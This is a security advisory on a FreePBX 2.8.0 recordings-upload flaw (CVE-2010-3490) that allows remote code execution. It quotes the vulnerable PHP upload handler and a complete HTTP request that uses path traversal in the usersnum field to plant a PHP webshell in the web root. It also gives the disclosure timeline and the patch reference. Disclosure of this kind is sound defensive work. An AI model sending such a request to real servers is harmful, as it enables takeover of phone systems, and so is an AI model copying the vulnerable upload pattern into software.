FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution

2010.10.01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Trustwave's SpiderLabs Security Advisory TWSL2010-005: FreePBX recordings interface allows remote code execution https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt Published: 2010-09-23 Version: 1.0 Vendor: FreePBX (http://www.freepbx.org/) Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it Version(s) affected: 2.8.0 and below Product Description: FreePBX is an easy to use GUI (graphical user interface) that controls and manages Asterisk, the world's most popular open source telephony engine software. FreePBX has been developed and hardened by thousands of volunteers,has been downloaded over 5,000,000 times, and is utilized in an estimated 500,000 active phone systems. Source: http://www.freepbx.org Credit: Wendel G. Henrique of Trustwave's SpiderLabs CVE: CVE-2010-3490 Finding: The configuration interface for FreePBX is prone to a remote arbitrary code execution on the system recordings menu. FreePBX doesn't handle file uploads in a secure manner, allowing an attacker to manipulate the file extension and the beginning of the uploaded file name. The piece of code below, found in page.recordings.php, illustrates part of the recordings upload feature. /* Code removed to fit better on advisory */ <?php if (isset($_FILES['ivrfile']['tmp_name']) && is_uploaded_file($_FILES['ivrfile']['tmp_name'])) { if (empty($usersnum)) { $dest = "unnumbered-"; } else { $dest = "{$usersnum}-"; } $suffix = substr(strrchr($_FILES['ivrfile']['name'], "."), 1); $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix; move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename); echo "<h6>"._("Successfully uploaded")." ".$_FILES['ivrfile']['name']."</h6>"; $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.'); } ?> /* Code removed to fit better on advisory */ When a file is uploaded, a copy is saved temporarily under the /tmp/ directory, where the name of the file is composed of user-controlled-staticname.extension, where: "user-controlled" is $usersnum variable. "staticname" value is -ivrrecording. "extension" is controlled by the user. If $usersnum variable is not defined, then a static string (unnumbered) is used. Finally, when the user clicks on the save button on the System Recordings interface, the file is saved with the original file name provided by the user under the /var/lib/asterisk/sounds/custom/ directory. When uploading a file, an attacker can manipulate the $usersnum variable to perform a path traversal attack and save it anyplace that the web server user has access, for example the Apache's DocumentRoot. This allows an attacker to upload malicious code to the web server and execute it under the webserver's access permissions. The HTTP request below illustrates the upload of a phpshell. POST /admin/config.php HTTP/1.1 Host: 10.10.1.3 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://10.10.1.3/admin/config.php Cookie: ARI=cookieValue; PHPSESSID=cookieValue Authorization: Basic base64auth Content-Type: multipart/form-data; boundary=---------------------------5991806838789183981588991120 Content-Length: 116089 -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="display" recordings -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="action" recordings_start -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="usersnum" ../../../../../var/www/html/admin/SpiderLabs -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="ivrfile"; filename="webshell.php" Content-Type: application/octet-stream <?php /* WebShell code goes here */ ?> -----------------------------5991806838789183981588991120-- To access the webshell in this example, an attacker would use the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php Maintainer Response: The maintainer has released a patch to address this issue for all versions of the software 2.3 and newer. Details of the patch can be found here: http://www.freepbx.org/trac/ticket/4553 Remediation Steps: Install the maintainer-provided patch. Vendor Communication Timeline: 08/13/10 - Initial contact 08/18/10 - Vulnerability disclosed 09/16/10 - Initial fix proposed by maintainer 09/22/10 - Fix reviewed, improved, and released by maintainer 09/23/10 - Advisory public release Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

References:

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt
http://www.securityfocus.com/bid/43454
http://www.securityfocus.com/archive/1/archive/1/513947/100/0/threaded
http://www.freepbx.org/trac/ticket/4553
http://www.exploit-db.com/exploits/15098


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